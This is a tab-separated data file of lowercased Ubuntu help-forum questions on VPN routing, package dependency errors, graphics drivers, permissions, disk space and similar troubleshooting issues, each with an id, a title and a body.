416183	vpn routing table for sip clients	i have a small problem with linux routing using vpn ( ppp0 interface ) . i use vpn to connect to my office from home . this works just fine with the following exception . when i try to connect to asterisk server ( sip ) at 192.168.2.54 , most sip clients can not connect . for some reason they think that they should not do it through ppp0 and instead try to do it through eth0 . this is the routes table before connecting to vpn : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 this is the routes table after connecting to vpn ( ppp0 ) : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 xx.xxx.11.9 192.168.1.1 255.255.255.255 ugh 0 0 0 eth0 xx.xxx.11.9 192.168.1.1 255.255.255.255 ugh 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.45.1 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 if i remove the check box `` use this connection only for resources in its network '' for ppp0 , sip client connects to the asterisk server , but all internet resources can not be accessed . this is the route table when sip works , but `` facebook '' does not : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 xx.xxx.11.9 192.168.1.1 255.255.255.255 ugh 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 can you please help me to add a route to the table that will enable the sip client to connect to the asterisk server 192.168.2.54 and at the same time allows me to connect to the internet ( the combination of tables 2 and 3 ) ? thank you in advance .
416184	share os updates with other machines	i have switched my operating system recently from windows to ubuntu . now i had installed the updates through update manager , now i want to do the same updation to an another system loaded with ubuntu . can anybody tell me that where these updates get downloaded and is it possible to port these updates to another machine without downloading ? ?
416190	are all ubuntu update download servers http only ?	in update manager 's software sources , the option exists to choose a download server and protocol like shown below . do all updates download via http only ? and if https ( or sftp ) are n't supported , why does the option exist ? related question here , though it only deals with full iso images .
416191	if i just install ubuntu server from a cd will it wipe any partitions ?	i want to install ubuntu server from a cd but it does n't say anything about partitions or anything . how does that work ? does it even use a partition and if so which one will it use and will it ruin the data on that or any other partition ? or can is there a way i can just run it from my desktop ? i did n't see any links other than the one for the .iso file .
416192	buc - just one click unavailable burg	some months ago , i installed and customized burg in my desktop using the sbm and buc ( just one clic ) . now , i 've bought a laptop and i installed linux mint 16 , with cinnamon . i was trying to install the sbm but now the page where i 've downloaded buc and its repositories are unavailable : http : //ww2.buc.billeragroup.net/ ? page_id=15 somebody knows what alternatives are to sbm or buc ? thank you .
416193	how to restrict changes to file permissions ?	the situation : back to this question : setting up shared development machine i proposed a method to create directories inside the webroot for each user in a shared environment . i think it 's perfect but there is one problem that i do n't have an answer for . i gave each user a permission of 750 for user : user and group : www-data . now every thing is fine unless a user changes the permission of his associated directory . the problem is how to prevent a user who own a folder from changing its permission and here i 'm asking for directory permission not the files inside the directory . any ideas ?
416196	unable to correct dependencies	i have a 11.10 ubuntu server machine located on a vps that has package problems . i think this all started with my do-release-upgrade failed part way through . in any case , i can no longer use apt-get to install anything because of unmet dependencies . root @ vpsstart : /etc/apt # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.13-20ubuntu5.3 ) libc6-dev : depends : libc6 ( = 2.15-0ubuntu10.5 ) but 2.13-20ubuntu5.3 is installed depends : libc-dev-bin ( = 2.15-0ubuntu10.5 ) libmono-corlib4.0-cil : depends : mono-runtime ( > = 2.10.8.1 ) but 2.10.5-1ubuntu0.1 is installed libmono-i18n4.0-cil : depends : mono-runtime ( > = 2.10.8.1 ) but 2.10.5-1ubuntu0.1 is installed libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9.1 ) but 1.0.3-4ubuntu2 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies my sources.list looks like this : deb http : //archive.ubuntu.com/ubuntu oneiric main restricted universe deb http : //archive.ubuntu.com/ubuntu oneiric-updates main restricted universe deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted universe multiverse deb http : //archive.canonical.com/ubuntu oneiric partner deb http : //download.webmin.com/download/repository sarge contrib deb http : //webmin.mirror.somersettechsolutions.co.uk/repository sarge contrib i 've tried apt-get clean and apt-get autoclean and of course i 've done an apt-get update numerous times . any magic that will allow me to get my package system straightened out ?
416202	path to file invalid	i 'm trying to start a program with mono . i 'm typing : mono `` home/shopy/smath_studio/smath/smath.exe '' i 'm getting can not open assembly 'home/shopy/smath_studio/smath/smath.exe ' : no such file or directory . what am i doing wrong ?
416203	libreoffice menus are disabled in ubuntu	suddenly all menus in lo 4.1 became disabled . reinstalling lo did n't help . upgrading to 4.2 stable also . menus are still inactive , while icons and shortcuts work well . in libreoffice forums guys reffering to ubuntu forum . so asking the same question here . any ideas ? screenshot :
416204	screen display missing	i installed ubuntu 12.04 server . after installation i can only see a black screen just like a terminal in full screen . its the same every time i restart.but i ca n't find a desktop ( ubuntu screen with icons etc . ) am i missing something ? can it be solved by some installations ?
416208	contributing to ubuntu packages	i 'm using the sfml library which - was n't at all tedious but - took about 30 minutes to get it configured properly . now the library is available using apt-get , but it installs an earlier version . is there any way for me to contribute the newer version of the library to ubuntu repository ?
416210	acer aoa150 problem with eth0 ... !	as i said i have an acer aoa150 . when i wrote ifconfig in terminal : root @ bt : ~ # ifconfig eth0 link encap : ethernet hwaddr 00:23:8b:48:88 : b4 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:44 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:53 errors:0 dropped:0 overruns:0 frame:0 tx packets:53 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:12753 ( 12.7 kb ) tx bytes:12753 ( 12.7 kb ) wlan0 link encap : ethernet hwaddr 00:24:2b:13 : c7:94 inet addr:192.168.1.81 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :224:2bff : fe13 : c794/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2428 errors:0 dropped:0 overruns:0 frame:0 tx packets:1068 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1206358 ( 1.2 mb ) tx bytes:143325 ( 143.3 kb ) so there is no eth0 . besides rx bytes : 0 and tx :0.however i 'm in internet . tell me please what to do about them ? i have wifi card atheros ar5bxb63 . thank you in advance .
416214	how can i remove the ubuntu one icon from my panel bar ?	i am new to ubuntu , and am using ubuntu 13.10 64-bit . the ubuntu one icon is between wifi and keyboard icons . here is a screenshot .
416216	13.10 - bumblebee with nvidia optimus 750m - stuck in high resolution ( 3200*1800 ) and drivers issues	dear ubuntu friends , i am a happy owner of a dell xps 15 9530 with ubuntu 13.10 installed on it . well ... happy until yesterday . although with some difficulties to install ubuntu on it ( intel smart technology , high dpi not supported ... ) , i solved all the issues and managed to enjoy a lot the world of ubuntu ( with a 1920*1080 resolution ) . however 2 days ago i naively accepted an `` ubuntu base '' update . since then i had to postpone my work for struggling on nvidia drivers issues and wrong resolution . here are all the new problems i encounter : stuck in high resolution ( 3200*1800 ) : in the system preferences , display tab , only this resolution available ( built-in display only available ) . it 's particularly bothering because everything is extremely small in size . brightness control buttons not working . i also been looking a lot on google to solve this . if trying to watch a video , these ones lag a lot ( only 4-5 images per seconds ) . i can also notice this when i switch of workspace or if i write fast ... the followings might help you to understand my problem : no ubuntu loading logo when starting up . launching nvidia-settings seems to work , but my terminal will also display this error message : first line `` ( nvidia-settings:7024 ) : warning : prime : failed to execute child process `` /usr/bin/prime-supported '' ( no such file or directory ) '' second line `` message : prime : is it supported ? no '' while trying to re-install ( again and again ) the nvidia drivers , i succeed to obtain all the possible errors : ) but never to make it work : ( lastly i have been following this tutorial : http : //wiki.belmankraul.com/linux/mint16_bumblebee this is the last configuration i have ( nividia drivers 331.38 ) . not sure if everything worked so i would like to add that : i am not using mint , only ubuntu , but nothing on the tutorial seems to apply only for mint ... i have seen some solutions on similar problems would be to use nvidia-xconfig . i would prefer not because it will create a xorg.conf , which can affect my bumblebee configuration . it is with a great pleasure i would provide you any command results or file ' contents . thanks , edouard ps1 : i might be verbose ... tell me what is unrelated to my problem and i will edit my question . ps2 : i have seen that version alpha 2 of 14.04 has been released few days ago . might help ? however this is my work station so i would prefer the most stable solution ...
416220	problem adding printer to virtual machine	i 'm running 12.04 64 bit on my laptop and i have a virtual machine ( win7 ) created and using with virtual box ( 4.3.6 incl . extension pack ) . further i have an kyocera fs-1041 printer which i can not use with linux cause of incompatibility with gdi . is there a way to tunnel the printer to my virtual machine and printing there ? i already tried some filters for usb in virtual box but i failed . any ideas how to solve this problem using a virtual machine ?
416221	ubuntu 13.10 can not start synaptic	i am running ubuntu 13.10 , $ uname -a linux n5010 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 x8664 x8664 x86_64 gnu/linux i have tried installing synaptic via command line ( both apt-get & aptitude ) or via software-center , but the result is always the same - it will not start ! i can successfully execute : $ synaptic -- help synaptic for debian 0.80.2 usage : synaptic [ options ] -h this help text -r open in the repository screen -f= ? give an alternative filter file -t give an alternative main window title ( e.g . hostname with uname -n ) -i= ? start with the initial filter , with given name . -o= ? set an arbitrary configuration option , eg -o dir : :cache=/tmp -- upgrade-mode call upgrade and display changes . -- dist-upgrade-mode call distupgrade and display changes . -- update-at-startup call `` reload '' on startup . -- non-interactive never prompt for user input . -- task-window open with task window . -- add-cdrom add a cdrom at startup ( needs path for cdrom ) . -- ask-cdrom ask for adding a cdrom and exit . -- test-me-harder run test in a loop . however when attempting to execute it , i get : error in `synaptic ' : malloc ( ) : memory corruption : 0x00000000028754f0 * note : the address will change on every new/reinstall ! i have tried : $ sudo apt-get purge synaptic $ sudo apt-get install synaptic $ sudo apt-get install synaptic -- reinstall synaptic and countless others on the same theme , but the result is always the same . any help appreciated . happy to provide any additional information . have also tried installing via software-center as well as aptitude ( just for comparison ) , but this has the same result . i have even searched & changed the line in /usr/share/applications/synaptic.desktop , from exec=synaptic-pkexec to exec=gksudo synaptic but it changes nothing . this is even more annoying as everything worked fine before i had to replace my hard disk . so any help greatly appreciated . thanks . /vince ..
416222	share directories with active directory users	i need to configure an ubuntu , to share directories . the allowed users are in an active directory in windows 2003 server . can i use ntlm for that or only kerberos ?
416225	ubuntu 13.10 black screen + empty disc space message	i have big issue which linux . well after bleach bit clean all was broken . now when i want to login on admin password , i see black screen which mouse . in guest account all is ok. any ways when i try to fix it by alt + ctrl + f1 login to my admin abound ( that which is shown before normal log in ) do not match . for the more in guest account i have announcement , that 0 disc space . any idea what to do ? please help .
416228	why am i unable to update 12.04 ?	i 'm unable to update my ubuntu 12.04 . when i run $ sudo apt-get update i 'm getting the following output . naveen @ naveen-inspiron-3521 : ~ $ sudo apt-get update e : malformed line 10 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . naveen @ naveen-inspiron-3521 : ~ $ sudo gedit /etc/apt/sources.list naveen @ naveen-inspiron-3521 : ~ $ sudo apt-get update hit http : //dl.google.com stable release.gpg hit http : //dl.google.com stable release hit http : //ppa.launchpad.net precise release.gpg hit http : //in.archive.ubuntu.com precise release.gpg hit http : //dl.google.com stable/main i386 packages get:1 http : //in.archive.ubuntu.com precise-security release.gpg [ 198 b ] ign http : //ppa.launchpad.net precise release.gpg ign http : //dl.google.com stable/main translationindex hit http : //ppa.launchpad.net precise release.gpg get:2 http : //in.archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //in.archive.ubuntu.com precise release hit http : //ppa.launchpad.net precise release ign http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release get:3 http : //in.archive.ubuntu.com precise-security release [ 49.6 kb ] hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //dl.google.com stable/main translation-en_us get:4 http : //in.archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : //ppa.launchpad.net precise/main translationindex ign http : //dl.google.com stable/main translation-en hit http : //in.archive.ubuntu.com precise/main sources hit http : //in.archive.ubuntu.com precise/restricted sources ign http : //ppa.launchpad.net precise/main translationindex hit http : //in.archive.ubuntu.com precise/universe sources hit http : //ppa.launchpad.net precise/main sources hit http : //in.archive.ubuntu.com precise/multiverse sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources get:5 http : //in.archive.ubuntu.com precise-security/main sources [ 96.8 kb ] hit http : //ppa.launchpad.net precise/main i386 packages get:6 http : //in.archive.ubuntu.com precise-security/restricted sources [ 2,494 b ] ign http : //ppa.launchpad.net precise/main translationindex get:7 http : //in.archive.ubuntu.com precise-security/universe sources [ 30.9 kb ] get:8 http : //in.archive.ubuntu.com precise-security/multiverse sources [ 1,797 b ] get:9 http : //in.archive.ubuntu.com precise-updates/main sources [ 451 kb ] get:10 http : //in.archive.ubuntu.com precise-updates/restricted sources [ 8,028 b ] get:11 http : //in.archive.ubuntu.com precise-updates/universe sources [ 103 kb ] get:12 http : //in.archive.ubuntu.com precise-updates/multiverse sources [ 8,486 b ] err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en fetched 802 kb in 23s ( 34.7 kb/s ) w : failed to fetch http : //ppa.launchpad.net/gijzelaar/opencv2.3/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/gijzelaar/opencv2.3/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how can i solve this ?
416229	unknown command 'fwsetup ' in grub setup	i am a newbie . i installed recently ubuntu 12.04 lts 64 bit on computer with windows 7 . i can boot to both . the problem is that when i press system setup in grub2 menu , it says error : unknown command 'fwsetup' and returns to the initial menu . boot repair reinstalled grub2 , but fwsetup command is still missing . see output here . what do i do wrong ?
416230	is there a program to track the keyboard and display it on a terminal ?	i have bought a new blue tooth keyboard for my desktop and got it to work with ubuntu but the problem is that most of the function keys do not work properly and i wonder if the problem is with the keyboard or the driver . i thought if there is a tool that show the keyboard code of the keys pressed so i can see if the transmitted codes are the correct ones or not .
416232	unable to login through gui as a user but i am able to login via terminal	i am unable to login through gui as a user but i am able to login via terminal . this occurred after i installed 2 steps authenticator of google using apt-get install command . i followed these steps : sudo apt-get install libpam-google-authenticator edited /etc/pam.d/sshd and add the following line to the file : auth required pam_google_authenticator.so edited /etc/ssh/sshd_config and changed challengeresponseauthentication to yes i restarted the ssh service . root @ george : ~ # ls -l /home/george/.xauthority -rw -- -- -- - 1 root root 125 jan 31 19:35 /home/george/.xauthority
416233	connecting remotely from ubuntu to another linux	i want to connect remotely from ubuntu to suse . two different systems in two different locations . i know how to use ssh to connect remotely to a machine in the same network . but , i do not know how to connect machines from two different locations .
416235	unable to login guest user from n-computing of ubuntu os	i do have a dell server t320 with n-computing l300 which installed , - ubuntu desktop v12.04.3 `` created 2 users , admin and guest '' - vspace v3.2.2.27 i would like to login guest user in all n-computing l300 , unfortunately whenever login guest user l300 automatically logout and that device was hang `` stuck '' , so we must be power off and on l300 . could you please advice , is that possible to use guest user to login in n-computing l300 ? . regards , vutha
416236	automatically set permissions for new file	i am running ubuntu 12.04lts and have a problem with newly downloaded files from torrents . i have tried both qbittorrent and deluge and the result is the same . the folders created are 775 and the files are 664 . i repeat that this only happens to files downloaded by torrent programs . any other folder and file created are 777 . i am sharing these files through samba and i would like them to be 777 . is there a way for this to happen automatically everytime a file is created ?
416238	how to disable welcome message in minicom	i'v receive welcome message as below and i want to remove that when i start minicom , please help . welcome to minicom 2.5 options : i18n compiled on dec 7 2011 , 12:04:29 . port /dev/ttyusb0 press ctrl-a z for help on special keys
416241	how to update libreoffice 4.0 to 4.2	how would i update libreoffice 4.0 to 4.2 , i tried the default apt-get update ' and 'upgrade but it did n't detect that there is a new version yet . i am using ubuntu 12.04
416243	keyboard shortcut to shutdownpc in lubuntu desktop 12.04	i have recently installed lubuntu-desktop metapackage in my ubuntu 12.04 lts . but in lubuntu i ca n't find any keyboard shortcut to shutdown or logout [ in unity or gnome i used ctrl+alt+del but now it opens task manager ] . can anyone please provide me keyboard shortcuts to these commands . thanks in advance .
416247	libreoffice , libreoffice impress and libreoffice calc are not opening on projector	i have an hp notebook with ubuntu . on my notebook libreoffice , libreoffice impress ( ppt ) and libreoffice calc are not connecting with my projector .
416249	how can i know which dvds will play on my system ?	there are plenty of questions where people essentially want to know how to play their dvds ( how can i play encrypted dvd movies ? , lord of the rings , toy story , another one ) . is there any way to know before you buy a dvd to know if it runs on your system ? obviously , simply looking at the dvd does not help : is there any online service or another way to get to know if you can watch a dvd on your computer before buying it ? edit : sometimes , amazon customers give this information if it is not working . but i would also appreciate a `` white list '' of dvds that do work .
416251	how to get third-party docks to work with ubuntu unity ?	i 'm using ubuntu 13.10 with default unity . i 'd like to install another taskbar ( dzen2 ) to be docked somewhere on the screen . i start it with 'dzen2 -dock ' but the rest of the windows in unity do n't seem to know it 's there , and appear under the dock ( obscuring themselves ) rather than appearing below the dock ( kind of like how other windows do n't get obscured by the default taskbar in unity across the top of the screen ) . how can i get third-party docking programs to work with unity ?
416252	nvidia geforce 9200 ubuntu 13.10 driver	what is the best driver to use with this gpu ? ubuntu is running fine with the internal driver , but is there a better one available ?
416253	can not open ccsm	i uninstalled compiz , compizconfig-settings-manager and unity ( sudo apt-get purge -- auto-remove ) . moreover i removed manually ( sudo rm -rf ) all folders connected with compiz : compiz and compizconfig directories ( also from file system ) . now i installed back compiz , compizconfig-settings-manager and unity . when i want to run ccsm ( i have to turn on unity plugin ) from a terminal i get following info : libcompizconfig : dlopen : usr/lib/compizconfig/backends/libini.so : can not open shared object file : no such file or directory integration : true profile : default adding plugins segmentation fault ( core dumped ) how to fix that ?
416254	how to setup a private git repository ?	i am running ubuntu 12.04 and created a git server and gave some users access to one repos i created . i have trouble to download the repos using open ssh through command line , no putty nothing . i am using this command to download the repos called training : ssh : //username @ xx.xx.xx.xx:22/srv/git/training.git and i tried a lot like ssh : //username @ xx.xx.xx.xx:22/srv/git/training.git training using this tutorial : ted felix git server the error i get is this : fatal : '/srv/git/training/training ' does not appear to be a git repository fatal : could not read from remote repository . my suggestion is , that my repos is not setup correctly . or i made a mistake with this ssh keys . any ideas ? i can provide all information you need , just let me know what 's missing . edit : it works using the command line ( git bash ) ... intereseting output as requested of folder permissions xxxxxx @ defaultenvironment : ~ $ ls -la /svr/git/training total 16 drwxr-sr-x 3 root git 4096 feb 4 12:55 . drwxrwsr-x 4 xxxxxx git 4096 feb 4 12:40 .. -rw-r -- r -- 1 root git 9 feb 4 12:55 catchmeifyoucan drwxrwsr-x 8 root git 4096 feb 4 12:56 .git
416257	armitage ( msf gui ) wo n't connect ... .help	i 've ubuntu 12.04 lts asus k55a series metasploit framework ( v4.8.2-1 ) community edition here the photo armitage jdk 7 when i open armitage it freezes but the console is still open i 've been enter all information in the right way
416258	hardware acceleration problem with oibaf ppa	i get the latest open source graphics drivers from oibaf ppa , but the latest updates seem to have turned hardware acceleration off . this has happened on both my computers running open source drivers , but not with another fglrx machine . so , until what appears to be a regression is fixed is there any way i can manually turn on hardware acceleration so i can play world of tanks ?
416259	it is possible to run a exe file in redhat	i am new to linux . i run the batch file which will execute exe file in automated way . i need to do the same in linux . kindly give me some idea how to use it . thanks in advance
416261	unable to find some installed apps on ubuntu touch on nexus 4	yesterday i installed ubuntu touch on my nexus 4 , and it was working fine i was able to access terminal and some other apps . but today morning i rebooted my phone and after that i am not able to find some installed apps ( like terminal and some others are also missing ) . can anyone help me that what happened after reboot and how i can access those apps again thanks in advance . edit : - i am able to see all installed apps in setting- > about ubuntu- > storage , but can access only 9 apps those are visible in home screen
416263	unable to installing ubuntu 13.10 alongside windows 8.1	here is a duplicate of the thread , but i need an answer so i decided to open up another question . so , here is my problem , i want to install ubuntu alongside windows 8.1 . i boot up the ubuntu live demo , and even without it i get the same message . the installation goes great up until the installation type is asked . i connect to the internet , even if i do n't , it 's all the same . and the screen then freezes . i ca n't continue the installation . i just get these : i really need help because i need the ubuntu up and running as soon as possible . please help me . edit : i did everything as instructed in the links below , and still as if there is not a single hdd connected , ca n't do anything .
416264	dell vostro 1310 no brightness control	a customer of mine gave me his old notebook because he bought a new one . originally equipped with vista , now the laptop is running xubuntu 13.10 . all works fine except for the brightness control : when i press the appropriate key on keyboard the notification area show the slider but with no effect on the screen back-light . i 've seen different questions about brightness on dell notebooks ( vostro 3500 , 1710 and xps ) but no one seems to work till now . the notebook i have has an intel x3100 integrated video not the nvidia 8400m : 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c )
416266	from terminal halt needs su permission while from top gnome panel , su is not required , why ?	i think i am clear with my question - why from terminal either we use halt or poweroff , it needs root privilege when on other hand gnome panel power button do n't ask for it ? how it is implemented internally ?
416273	logitech k260 wireless keyboard -not working but mouse works after upgrade 13.04 to 13.10	this is strange , but bear with me . i upgraded my 13.04 to 13.10 and everything appeared to upgrade flawlessly . at the end , i rebooted and was able to use logitech k260 keyboard to type in my password and get to the desktop screen . from that point on , 13.10 would not get any input from the keyboard , however the mouse works well . before i upgraded to 13.10 , i , a few months ago , did a fresh install of 13.10 on a different partition . i am using that installation of 13.10 to write this . so , something is wrong with the upgrade as there are two bootable partitions , one working , and one not . i would appreciate any help with this . thanks , bill this is dmesg | tail for the working 13.10 . if you can point where to look for the not-working 13.10 i would appreciate it . dmesg | tail [ 674.392429 ] usb 5-2 : usb disconnect , device number 3 [ 685.499737 ] usb 5-2 : new full-speed usb device number 4 using ohci-pci [ 685.673020 ] usb 5-2 : new usb device found , idvendor=046d , idproduct=c52e [ 685.673033 ] usb 5-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 685.673041 ] usb 5-2 : product : usb receiver [ 685.673046 ] usb 5-2 : manufacturer : logitech [ 685.681672 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:13.0/usb5/5-2/5-2:1.0/input/input13 [ 685.681932 ] hid-generic 0003:046d : c52e.0003 : input , hidraw0 : usb hid v1.11 keyboard [ logitech usb receiver ] on usb-0000:00:13.0-2/input0 [ 685.687249 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:13.0/usb5/5-2/5-2:1.1/input/input14 [ 685.687702 ] hid-generic 0003:046d : c52e.0004 : input , hiddev0 , hidraw1 : usb hid v1.11 mouse [ logitech usb receiver ] on usb-0000:00:13.0-2/input1
416274	a load of free space just vanished	well , it 's kind of unusual and serious problem . for two or three weeks circa 20 gb from my home folder just vanished . it 's not a matter of any big files , even hidden , because i checked it out many times and i used disc analyzer . how does it look from my perspective ? maybe ( but it is only guess , not proof ) it 's a fault of virtualbox . at least , the problem began after installing this program . i choose an option of create virtual disc or something like that , but then i claimed there is no need to do this , and soon turn on the program . however , the trouble occur . the computer started to work hard and there was shown info , that there is only 900 mb free space ( more or less , i do not remember , but it should be 20 gb ) . what i remember is then i wanted to uninstall vitrualbox and x86 virtualization solution , but it was just impossible . i tried to switch on root , but after log out there was shown a column of communiques and the only way to turn off the computer was power cut . when i log in root , some problems still existed , i did n't see any possible large files or something , and what is more there was a communique-info about any error of programmer . but nevermind . finally i uninstalled both virtualbox and x86 virtualization solution . however the trouble still existed . i also deleted some large programs , like playonlinux , so it allowed me to get a few gb free space . still too less , but ... it is quite bizarre . the free space in my home folder changes regardless if i download or delete files . well , there was a period , when i did n't download or delete , just shut down or turn on my computer , and free space rised . after delete playonlinux , there was 3,5 gb free space , and after next day it was circa 8 gb , then even over 10 . but it is still too little . two days ago , i had to copy some files form my pendrive . they were only powerpoint presentations , so the size of them was about few mb . after plug in pendrive and copy files , the computer slow down again , and the communique about no free space on disc occur again . it was necessary to me to work on it , so i deleted two large files ( about 6,5 gb ) to work calm , but after next turning on computer , this free space also vanished ! i do not know if i make myself clear . it does not look like there is any large file on my disc , but if something still shortened the disc size . i do not know if it is any tip , but when i want to edit a file made in libreoffice , i can not do this , because there is communique about use to read only or open copy . before this accident it had never occur . and now , there are results from terminal commands ( my logs are embed here ) : http : //ubuntu.pl/forum/viewtopic.php ? f=127 & t=171771 but no one can help me . any ideas ?
416276	how do i get a newer version of java ?	for school work , i have to read a cd . problem one : need to read the cd without a reader . solved by creating a .iso on an adjacent computer . now , there is already a linux `` run '' program on the file . when i run that , it opens text editor with the following short code inside : \ # ! /bin/bash export path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin./uvmapp_linux/uvm nothing really happens with it : ( when i open the windows launcher through wine , it refuses me access , since i need java 1.5 . i am currently using iced tea web , which is java 1.4 updating does not solve the problem .
416278	ubuntu boots into terminal mode with read-only access to hard drive ?	ubuntu crashed randomly and had to hard reset the system , now when i boot my machine i get an error has occurred while mounting media/disk_2 ( disk 2 is a secondary hard disk ) i am faced with either skip mounting that disk or manual mounting skipping it will take me to a terminal login , logged in i can see all my files using ln . the hard disk is in read only mode . mounting manually i can see the boot log 'ext2-fs ( sdb3 ) : error : ext2_lookup : deleted inode referenced : 175' i do n't know what really to do or how to get back into gui mode
416279	ubuntu randomly shows shutdown dialogue and then dies	i 've found a number of posts on related problem to mine , but none of them seem to address the exact issue . my apologies if i missed something and this ends up being a double post ! basically , for a few weeks now my laptop erratically shuts down when running ubuntu 12.04 . what happens is that it displays the shutdown dialogue : shut down this system now ? you are currently logged in as ... . the system will automatically be shut down in 60 seconds . ok / cancel / ... regardless of what i do at this stage ( press one of the buttons / do nothing ) , the computer will shortly after completely shut down . i mean shut down in the brutal fashion , as in turn itself off immediately with all software complaining after the next boot that they were n't shutdown correctly . i am running windows in dual-boot and do n't experience the same problem there . maybe this does n't completely rule out a hardware issue but it seems to make it a lot less likely . as most posts on similar issues talked about heating , i also installed sensors to monitor the temperature of my laptop ( a toshiba a660-18n ) . the hd is at around 30째c , the graphics card and cpus fluctuate between 56째c and 62째c , so nothing out of the ordinary from what i understand . i looked in various log files for some hints as to what 's going on , but did n't make progress . below is an excerpt from the last time this happened . the laptop died at around 12:08:00 and i rebooted shortly after . the messages from 12:08:45 are from startup already . feb 4 12:06:34 splinter kernel : [ 1504.401787 ] type=1400 audit ( 1391515594.358:36 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /shared/files/dphil/thesis/0_acknowledgements.aux '' pid=4562 comm= '' pool '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 feb 4 12:06:49 splinter kernel : [ 1519.750029 ] audit_printk_skb : 168 callbacks suppressed feb 4 12:06:49 splinter kernel : [ 1519.750033 ] type=1400 audit ( 1391515609.706:93 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /shared/files/._lbfgsb.3.0 '' pid=4579 comm= '' pool '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 feb 4 12:08:45 splinter kernel : imklog 5.8.6 , log source = /proc/kmsg started . feb 4 12:08:45 splinter rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 1046 '' x-info= '' http : //www.rsyslog.com '' ] start feb 4 12:08:45 splinter rsyslogd : rsyslogd 's groupid changed to 103 does anyone have an idea what 's happening here ? i 've been running 12.04 pretty much since it came out and only started experiencing this problem recently over the past few weeks . it seems particularly strange that the shutdown dialogue appears but then my actions are being ignored by it . anyway , i 'd be very grateful for any pointers on how to fix this or investigate it better .
416282	`` package mysql-server is not installed '' even when it is installed	i am trying to install a deb package running the command dpkg -i code/mydeb.deb it gives an error saying dpkg : dependency problems prevent configuration of openmrs : openmrs depends on mysql-server ( > = 5.0 ) ; however : package mysql-server is not installed . i have lampp running on my os . running mysql commands like mysql and sudo mysql does not give any error . how can i overcome this error . update root @ ubuntu : /home/ankit # apt-cache policy mysql-server mysql-server : installed : ( none ) candidate : 5.5.35-0ubuntu0.12.10.2 version table : 5.5.35-0ubuntu0.12.10.2 0 500 http : //us.archive.ubuntu.com/ubuntu/ quantal-updates/main i386 packages 5.5.35-0ubuntu0.12.10.1 0 500 http : //security.ubuntu.com/ubuntu/ quantal-security/main i386 packages 5.5.27-0ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ quantal/main i386 packages update as suggested to me in the comments i installed mysql-server and the output of apt-cache policy mysql-server has now changed to but i still get the same error mysql-server : installed : 5.5.35-0ubuntu0.12.10.2 candidate : 5.5.35-0ubuntu0.12.10.2 version table : *** 5.5.35-0ubuntu0.12.10.2 0 500 http : //us.archive.ubuntu.com/ubuntu/ quantal-updates/main i386 packages 100 /var/lib/dpkg/status 5.5.35-0ubuntu0.12.10.1 0 500 http : //security.ubuntu.com/ubuntu/ quantal-security/main i386 packages 5.5.27-0ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ quantal/main i386 packages
